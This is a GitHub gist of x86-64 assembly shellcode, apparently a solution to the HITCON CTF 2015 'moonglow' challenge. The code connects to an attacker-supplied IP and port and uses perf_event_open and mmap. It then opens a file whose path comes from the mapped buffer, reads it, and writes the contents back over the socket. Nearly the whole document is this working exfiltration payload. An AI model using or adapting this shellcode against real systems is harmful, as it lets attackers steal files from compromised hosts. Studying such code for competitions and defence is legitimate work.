Created
October 20, 2015 11:27
-
-
Save shinh/3e4504560734a81d6223 to your computer and use it in GitHub Desktop.
HITCON CTF 2015 moonglow
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BITS 64 | |
| sub rsp, 0x1000 | |
| ;; socket | |
| mov rdx, 0 | |
| mov rsi, 1 | |
| mov rdi, 2 | |
| mov rax, 41 | |
| syscall | |
| mov [rsp-16], rax ; sock | |
| ;; connect | |
| mov dword [rsp+4], IP | |
| mov word[rsp+2], PORT | |
| mov word[rsp], 2 | |
| mov rdx, 16 | |
| mov rsi, rsp | |
| mov rdi, rax | |
| mov rax, 42 | |
| syscall | |
| cmp rax, 0 | |
| jnz fail | |
| ;; perf_event_open | |
| mov dword [rsp], 1 ; PERF_TYPE_SOFTWARE | |
| mov dword [rsp+4], 96 ; sizeof(struct perf_event_attr) | |
| mov qword [rsp+8], 9 ; PERF_COUNT_SW_DUMMY | |
| mov qword [rsp+16], 0 ; sample_period/sample_freq | |
| mov qword [rsp+24], 0 ; sample_type | |
| mov qword [rsp+32], 0 ; read_format | |
| mov qword [rsp+40], 1<<17 | 1<<8 | |
| mov qword [rsp+48], 0 ; wakeup_* + bp_type | |
| mov qword [rsp+56], 0 ; bp_addr | config1 | |
| mov qword [rsp+64], 0 ; bp_len | config2 | |
| mov qword [rsp+72], 0 ; branch_sample_type | |
| mov qword [rsp+80], 0 ; sample_regs_user | |
| mov qword [rsp+88], 0 ; sample_stack_user + reserved_2 | |
| mov r9, 0 ; flags | |
| mov r10, -1 ; group_fd | |
| mov rdx, -1 ; any CPU | |
| mov rsi, 3 ; 3 | |
| mov rdi, rsp ; attr | |
| mov rax, 298 | |
| syscall | |
| cmp rax, 0 | |
| jl fail2 | |
| ;; mmap | |
| mov r9, 0 | |
| mov r8, rax | |
| mov r10, 1 | |
| mov rdx, 3 | |
| mov rsi, 0x5000 | |
| mov rdi, 0 | |
| mov rax, 9 | |
| syscall | |
| cmp rax, -1 | |
| je fail2 | |
| mov [rsp-48], rax | |
| ;; write(STDOUT) | |
| mov byte[rsp], 104 | |
| mov byte[rsp+1], 0 | |
| mov rdx, 0x400 | |
| mov rsi, rsp | |
| mov rdi, 1 | |
| mov rax, 1 | |
| syscall | |
| ;; nanosleep | |
| mov rax, 1 | |
| mov [rsp], rax | |
| xor rax, rax | |
| mov [rsp+8], rax | |
| mov rdi, rsp | |
| mov rax, 35 | |
| syscall | |
| ;; open(flag) | |
| mov rdx, 0 | |
| mov rsi, 0 | |
| mov rdi, [rsp-48] | |
| add rdi, 0x1028 | |
| mov rax, 2 | |
| syscall | |
| cmp rax, 0 | |
| jl fail2 | |
| ;; read | |
| mov rdi, rax | |
| mov rsi, rsp | |
| mov rdx, 100 | |
| mov rax, 0 | |
| syscall | |
| ;; write | |
| mov rdi, [rsp-16] | |
| mov rsi, rsp | |
| mov rdx, rax | |
| mov rax, 1 | |
| syscall | |
| ;; exit | |
| mov rax, 60 | |
| syscall | |
| fail: | |
| mov byte[rsp], 102 | |
| mov byte[rsp+1], 10 | |
| mov rdx, 2 | |
| mov rsi, rsp | |
| mov rdi, [rsp-16] | |
| mov rax, 1 | |
| syscall | |
| mov rax, 60 | |
| syscall | |
| fail2: | |
| xor rdx, rdx | |
| sub rdx, rax | |
| mov byte[rsp], dl | |
| mov byte[rsp+1], 10 | |
| mov rdx, 2 | |
| mov rsi, rsp | |
| mov rdi, [rsp-16] | |
| mov rax, 1 | |
| syscall | |
| mov rax, 60 | |
| syscall |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment